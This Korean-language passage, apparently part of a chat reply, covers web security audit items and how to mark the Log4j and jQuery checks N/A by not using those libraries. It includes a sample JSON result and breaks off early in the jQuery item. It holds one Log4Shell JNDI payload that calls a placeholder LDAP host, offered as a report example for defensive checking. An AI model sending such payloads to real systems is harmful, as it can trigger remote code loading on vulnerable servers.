1. WEB-A03-001 취약한 Log4j 사용 → N/A

설계 방향

웹앱에서 Log4j를 아예 사용하지 않도록 하면 돼.

즉, pom.xml, WEB-INF/lib, 서버 라이브러리 경로 등에 log4j-core, log4j-api 같은 라이브러리가 없게 만드는 거야.

진단 시도

자동 진단 도구나 수동 진단에서 아래를 확인하면 돼.

1. 애플리케이션 라이브러리 목록 확인
2. 응답 헤더나 에러 메시지에서 Log4j 관련 흔적 확인
3. Log4Shell 형태의 JNDI 페이로드 입력 시 반응 확인

예시 페이로드는 보고서에는 이렇게만 적으면 충분해.

${jndi:ldap://test.example.com/a}

실제로 외부 LDAP 서버를 운영하거나 호출시키는 방식까지는 안 해도 돼.

프로젝트에서는 Log4j 미사용 여부 확인이 핵심이야.

판단 근거 예시

{
  "check_id":"WEB-A03-001",
  "result":"N/A",
  "evidence":"애플리케이션 라이브러리 및 응답에서 Log4j 사용 흔적이 확인되지 않았고, Log4Shell 관련 입력값에 대한 로그 기반 동작도 확인되지 않음",
  "reason":"Log4j 라이브러리를 사용하지 않는 서비스이므로 취약한 Log4j 사용 진단 대상이 아님"
}

2. WEB-A03-002 구버전 jQuery 사용 → N/A

설계 방향

웹앱에서 jQuery를 아예 사용하지 않도록 하면 돼.